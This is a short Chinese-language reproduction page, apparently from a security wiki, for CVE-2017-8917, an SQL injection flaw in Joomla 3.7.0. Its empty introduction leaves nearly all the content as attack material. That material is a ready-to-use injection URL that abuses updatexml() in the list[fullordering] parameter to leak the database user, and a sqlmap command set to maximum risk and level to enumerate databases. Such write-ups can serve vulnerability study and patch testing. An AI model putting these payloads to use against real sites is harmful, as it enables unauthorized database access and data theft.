(CVE-2017-8917)Joomla 3.7.0 QL注入漏洞

一、漏洞简介

二、漏洞影响

Joomla 3.7.0

三、复现过程

http://www.0-sec.org:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

1 1.pngJoomla3.7.0QL注入漏洞/media/rId24.png)

补充

sqlmap -u "http://www.0-sec.org/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Qingy文库 all right reserved,powered by GitbookFile Modify: 2021-07-15 19:54:55

results matching ""

    No results matching ""